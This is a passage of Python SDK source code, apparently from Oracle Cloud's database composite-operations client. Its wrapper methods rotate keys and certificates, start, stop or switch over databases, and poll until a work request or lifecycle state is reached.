An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_autonomous_container_database_encryption_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_autonomous_container_database_encryption_key(autonomous_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_autonomous_container_database_encryption_key_and_wait_for_state(self, autonomous_container_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_autonomous_container_database_encryption_key` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabase` acted upon
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_autonomous_container_database_encryption_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_autonomous_container_database_encryption_key(autonomous_container_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_autonomous_database_encryption_key_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_autonomous_database_encryption_key` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_autonomous_database_encryption_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_autonomous_database_encryption_key(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_autonomous_database_encryption_key_and_wait_for_state(self, autonomous_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_autonomous_database_encryption_key` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_autonomous_database_encryption_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_autonomous_database_encryption_key(autonomous_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_ords_certs_and_wait_for_work_request(self, autonomous_exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_ords_certs` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_exadata_infrastructure_id: (required)
The Autonomous Exadata Infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_ords_certs`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_ords_certs(autonomous_exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_ssl_certs_and_wait_for_work_request(self, autonomous_exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_ssl_certs` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_exadata_infrastructure_id: (required)
The Autonomous Exadata Infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_ssl_certs`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_ssl_certs(autonomous_exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_vault_key_and_wait_for_work_request(self, database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_vault_key` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_vault_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_vault_key(database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def rotate_vault_key_and_wait_for_state(self, database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.rotate_vault_key` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.rotate_vault_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.rotate_vault_key(database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def scan_external_container_database_pluggable_databases_and_wait_for_work_request(self, external_container_database_id, external_database_connector_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.scan_external_container_database_pluggable_databases` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str external_database_connector_id: (required)
The `OCID`__ of the
external database connector resource (`ExternalDatabaseConnectorId`).
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.scan_external_container_database_pluggable_databases`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.scan_external_container_database_pluggable_databases(external_container_database_id, external_database_connector_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def start_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.start_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.start_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.start_autonomous_database(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def start_autonomous_database_and_wait_for_state(self, autonomous_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.start_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.start_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.start_autonomous_database(autonomous_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def start_pluggable_database_and_wait_for_work_request(self, pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.start_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.start_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.start_pluggable_database(pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def start_pluggable_database_and_wait_for_state(self, pluggable_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.start_pluggable_database` and waits for the :py:class:`~oci.database.models.PluggableDatabase` acted upon
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.PluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.start_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.start_pluggable_database(pluggable_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def stop_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.stop_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.stop_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.stop_autonomous_database(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def stop_autonomous_database_and_wait_for_state(self, autonomous_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.stop_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.stop_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.stop_autonomous_database(autonomous_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def stop_pluggable_database_and_wait_for_work_request(self, pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.stop_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.stop_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.stop_pluggable_database(pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def stop_pluggable_database_and_wait_for_state(self, pluggable_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.stop_pluggable_database` and waits for the :py:class:`~oci.database.models.PluggableDatabase` acted upon
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.PluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.stop_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.stop_pluggable_database(pluggable_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def switchover_autonomous_container_database_dataguard_association_and_wait_for_work_request(self, autonomous_container_database_id, autonomous_container_database_dataguard_association_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.switchover_autonomous_container_database_dataguard_association` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str autonomous_container_database_dataguard_association_id: (required)
The Autonomous Container Database-Autonomous Data Guard association `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.switchover_autonomous_container_database_dataguard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.switchover_autonomous_container_database_dataguard_association(autonomous_container_database_id, autonomous_container_database_dataguard_association_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def switchover_autonomous_container_database_dataguard_association_and_wait_for_state(self, autonomous_container_database_id, autonomous_container_database_dataguard_association_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.switchover_autonomous_container_database_dataguard_association` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabaseDataguardAssociation` acted upon
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str autonomous_container_database_dataguard_association_id: (required)
The Autonomous Container Database-Autonomous Data Guard association `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabaseDataguardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.switchover_autonomous_container_database_dataguard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.switchover_autonomous_container_database_dataguard_association(autonomous_container_database_id, autonomous_container_database_dataguard_association_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database_dataguard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def switchover_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
